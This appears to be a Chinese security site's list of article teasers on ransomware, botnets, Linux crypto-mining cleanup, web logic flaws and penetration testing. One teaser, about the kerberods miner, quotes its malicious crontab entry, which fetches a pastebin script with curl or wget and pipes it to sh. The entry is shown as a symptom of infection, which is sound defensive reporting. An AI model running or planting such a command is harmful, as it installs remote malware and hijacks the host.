勒索软件利用 Windows 驱动程序漏洞关闭防病毒软件

安全公司 Sophos 警告说，新的勒索软件攻击使用了易受攻击的技嘉驱动程序，试图闯入 Windows 系统，然后禁用正在运行的安全软件。该攻击基于 2018 年在技嘉驱动程序中发现的安全漏洞，该安全漏洞在 CVE-2018-19320 中有详细说明。 该驱动程序在技嘉确认该错误...

2020 年勒索软件将继续流行

勒索软件将在 2020 年继续困扰组织，因为网络加密恶意软件攻击背后的网络罪犯几乎没有被抓住的风险。因此，对攻击者而言，风险很小，但潜在的回报却很大。 在过去的一年中，有许多勒索软件攻击的例子，已经有受害者屈服于攻击者的勒索要求，他们通常支付数十...

kerberods挖矿病毒查杀及分析(crontab 挖矿 curl -fsSL https://pastebin.com/raw）

一. 症状及表现 CPU使用率异常高，外出流量异常 crontab异常，存在如下定时任务(基本上就可以确定了) [root@it.net.cn ~]# crontab -l */15 * * * * （curl -fsSL https://pastebin.com/raw/xmxHzu5P||wget -q -O- https://pastebin.com/raw/xmxHzu5P)|sh 在...

记录一次清除Linux挖矿病毒的经历(sysupdate, networkservice进程)

起因 闲来无事准备用服务器搭建个环境玩玩，连上服务器之后发现命令行卡的飞起，使用top看看cpu占用率，这里上前三截图。 sysupdate 系统更新？？ networkservice 网络服务？？？ 上阿里云管理控制台看看CPU占用率，占用率直接100%，再看看CPU以及内存的记录...

挖矿病毒清除记录

挖矿病毒清除记录 出现现象 查看定时任务 开始解决 目前还存在三个问题： 出现现象 cpu是4核的但使用htop无法查看到，之前跑的服务进程都被kill掉了，重新启动服务依然被kill掉。 查看定时任务 crontab -l 会出现如下这些curl请求一个域名里面的数据并且下载...

【安全】Web应用常见业务逻辑漏洞

1短信炸弹 漏洞描述 短信轰炸攻击是常见的一种攻击，攻击者通过网站页面中所提供的发送短信验证码的功能处，通过对其发送数据包的获取后，进行重放，如果服务器短信平台未做校验的情况时，系统会一直去发送短信，这样就造成了短信轰炸的漏洞。 渗透测试 手工...

【安全】Web渗透测试（全流程）

1 信息收集 1.1 域名、IP、端口 域名信息查询：信息可用于后续渗透 IP信息查询：确认域名对应IP，确认IP是否真实，确认通信是否正常 端口信息查询：NMap扫描，确认开放端口 如果不会用Nmap，看这里：NMAP 基础教程（功能介绍，安装，使用） 发现：一共开放两...

针对运行 Webmin 的 Linux 服务器出现了新的 Roboto 僵尸网络

一个网络犯罪组织正在将运行易受攻击的 Webmin 应用程序（Linux 系统的基于 Web 的远程管理应用程序）的 Linux 服务器组建成一个新的僵尸网络，安全研究人员目前正在使用 Roboto 的名称对其进行跟踪。 僵尸网络的出现可追溯到今年夏天，这与披露了一个在超过...

微软爱 Linux：安全杀毒软件 Defender ATP 要出 Linux 版了！

微软宣布将于 2020 年将其企业安全产品 Defender 高级威胁防护（ATP）引入 Linux。 微软的年度开发者大会 Microsoft Ignite 刚刚结束，会上发布了一些与 Linux 有关的重要公告。你可能已经知道微软将 Edge Web 浏览器引入 Linux，而下一个大新闻是微软将 Def...

托管提供商 SmarterASP.NET 承认遭到勒索软件攻击，客户数据被加密

SmarterASP.NET 是一家拥有超过 44 万客户的知名 ASP.NET 托管提供商。昨日该公司发布公告称，遭到勒索软件的攻击，这也是 2019 年遭到攻击而下线的第三家大型网络托管公司，黑客不仅破坏了该公司的托管业务而且还对客户服务器上的数据进行了加密。 SmarterA...